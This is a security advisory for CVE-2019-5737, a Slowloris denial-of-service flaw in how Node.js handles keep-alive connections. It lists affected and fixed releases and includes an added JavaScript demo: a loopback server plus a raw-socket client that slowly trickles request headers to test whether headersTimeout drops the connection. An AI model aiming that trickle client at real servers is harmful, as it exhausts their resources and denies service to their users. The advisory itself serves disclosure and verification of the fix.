ASA-2019-00120 – Node.js: Slowloris HTTP Denial of Service with keep-alive


Allele Security Alert

ASA-2019-00120

Identifier(s)

ASA-2019-00120, CVE-2019-5737

Title

Slowloris HTTP Denial of Service with keep-alive

Vendor(s)

The Node.js Project

Product(s)

Node.js

Affected version(s)

All versions of Node.js 6 (LTS “Boron”)
All versions of Node.js 8 (LTS “Carbon”)
All versions of Node.js 10 (LTS “Dubnium”)
All versions of Node.js 11 (Current)

Fixed version(s)

Node.js 11.10.1 (Current)
Node.js 10.15.2 (LTS “Dubnium”)
Node.js 8.15.1 (LTS “Carbon”)
Node.js 6.17.0 (LTS “Boron”)

Proof of concept

Unknown

Description

All actively supported release lines are vulnerable and the severity is LOW. An attacker can cause a Denial of Service (DoS) by establishing an HTTP or HTTPS connection in keep-alive mode and then sending the headers of a request very slowly, keeping the connection and its associated resources (socket, parser, memory) alive for a long period of time. Attack potential is mitigated by the use of a load balancer or other proxy layer in front of Node.js.

This vulnerability is an extension of CVE-2018-12121, addressed in November 2018. That fix applied a timeout to the headers of the first request on a connection; on a keep-alive connection the headers of each subsequent request were not timed, so a client that completed one request could then trickle the next one for as long as it liked. The 40 second default timeout and its adjustment via server.headersTimeout apply to this fix as they do to CVE-2018-12121.
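The attack path and the headersTimeout mitigation, as an added example written for this alert (it is not part of the advisory text or of the Node.js project's own code): a keep-alive HTTP server with a short header timeout, and a raw-socket client that completes one request and then trickles the headers of a second request on the same connection without ever sending the blank line that ends the header block. On a release carrying the fix the server drops the socket shortly after headersTimeout elapses; on an unpatched release the second request is never timed and the socket stays open for as long as the client keeps sending. The loopback address, ephemeral port, 2 s / 400 ms timings and the X-Slow-N header names are assumptions chosen for the demonstration.

```javascript
// Added example for this advisory, not Node.js project code. A keep-alive HTTP
// server with a short headersTimeout, plus a raw-socket client that completes one
// request and then trickles the headers of a second request on the same
// connection, never sending the blank line that ends the header block.
// Assumptions: loopback address, an ephemeral port, the 2 s / 400 ms timings
// and the X-Slow-N header names are all chosen for the demo.

async function startServer({ headersTimeout, keepAliveTimeout, checkInterval }) {
  const http = await import('node:http');
  const server = http.createServer((req, res) => res.end('ok'));
  // Time allowed for a request's headers to arrive (40 s by default since the
  // CVE-2018-12121 fix); shortened here so the experiment finishes quickly.
  server.headersTimeout = headersTimeout;
  // Idle time allowed between requests on a keep-alive socket. Kept above
  // headersTimeout so it is not the timer that ends the experiment.
  server.keepAliveTimeout = keepAliveTimeout;
  // Node 18+ enforces headersTimeout from a periodic sweep (30 s by default);
  // older releases check it whenever bytes arrive. Shorten the sweep too.
  server.connectionsCheckingInterval = checkInterval;
  await new Promise((resolve) => server.listen(0, '127.0.0.1', resolve));
  return server;
}

// Body length announced by a raw HTTP response header block.
function contentLength(headerBlock) {
  const m = /^content-length:\s*(\d+)/im.exec(headerBlock);
  return m ? Number(m[1]) : 0;
}

// Resolves to { closedByServer, elapsedMs, headerLinesSent, serverReply };
// elapsedMs counts from the first byte of the trickled second request.
async function trickleSecondRequest(port, { interval, maxMs }) {
  const net = await import('node:net');
  return new Promise((resolve) => {
    const sock = net.createConnection({ port, host: '127.0.0.1' });
    const result = { closedByServer: false, elapsedMs: 0, headerLinesSent: 0, serverReply: '' };
    let firstResponse = '';
    let trickling = false;
    let started = 0;
    let ticker = null;
    let deadline = null;

    const finish = () => {
      clearInterval(ticker);
      clearTimeout(deadline);
      sock.destroy();
      resolve(result);
    };

    sock.setEncoding('utf8');
    sock.on('connect', () => {
      sock.write('GET / HTTP/1.1\r\nHost: localhost\r\nConnection: keep-alive\r\n\r\n');
    });
    sock.on('data', (chunk) => {
      if (trickling) { result.serverReply += chunk; return; }
      firstResponse += chunk;
      const end = firstResponse.indexOf('\r\n\r\n');
      if (end === -1 || firstResponse.length - (end + 4) < contentLength(firstResponse.slice(0, end))) return;
      // First exchange complete: the socket is now an idle keep-alive connection.
      trickling = true;
      started = Date.now();
      sock.write('GET / HTTP/1.1\r\nHost: localhost\r\n');
      ticker = setInterval(() => {
        if (sock.destroyed || !sock.writable) return;
        result.headerLinesSent += 1;
        sock.write(`X-Slow-${result.headerLinesSent}: still-here\r\n`);
      }, interval);
      deadline = setTimeout(() => {
        // Still open after maxMs: the server is not timing the second request.
        result.elapsedMs = Date.now() - started;
        finish();
      }, maxMs);
    });
    sock.on('error', () => {}); // a reset from the server still ends in 'close'
    sock.on('close', () => {
      if (trickling && result.elapsedMs === 0) {
        result.closedByServer = true;
        result.elapsedMs = Date.now() - started;
      }
      finish();
    });
  });
}

async function runExperiment({ headersTimeout = 2000, interval = 400, maxMs = 8000 } = {}) {
  const server = await startServer({
    headersTimeout, keepAliveTimeout: headersTimeout + 3000, checkInterval: 250,
  });
  try {
    const result = await trickleSecondRequest(server.address().port, { interval, maxMs });
    return { headersTimeout, ...result };
  } finally {
    server.close();
  }
}

runExperiment().then((r) => {
  const reply = r.serverReply ? ` (server said: ${r.serverReply.split('\r\n')[0]})` : '';
  console.log(r.closedByServer
    ? `slow keep-alive request dropped after ${r.elapsedMs} ms, headersTimeout=${r.headersTimeout} ms, ${r.headerLinesSent} header lines sent before the drop${reply}`
    : `connection still open after ${r.elapsedMs} ms: the second request on this keep-alive socket is not being timed`);
});
```

Run it as a single file under a fixed Node.js release. A patched release reports the drop a little over headersTimeout after the trickle starts (recent releases also answer 408 Request Timeout before closing); an unpatched release reports the connection still open at maxMs, and raising maxMs only prolongs it, which is the resource exhaustion the advisory describes. Keep keepAliveTimeout above headersTimeout when reproducing, otherwise the idle timer rather than the header timer ends the connection and the result says nothing about this fix.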

Technical details

Unknown

Credits

Marco Pracucci and Matteo Collina

Reference(s)

February 2019 Security Releases
https://nodejs.org/en/blog/vulnerability/february-2019-security-releases/

http: prevent slowloris with keepalive connections
https://github.com/nodejs/node/commit/1a7302bd48

CVE-2019-5737
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5737

CVE-2019-5737
https://nvd.nist.gov/vuln/detail/CVE-2019-5737

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: March 6, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.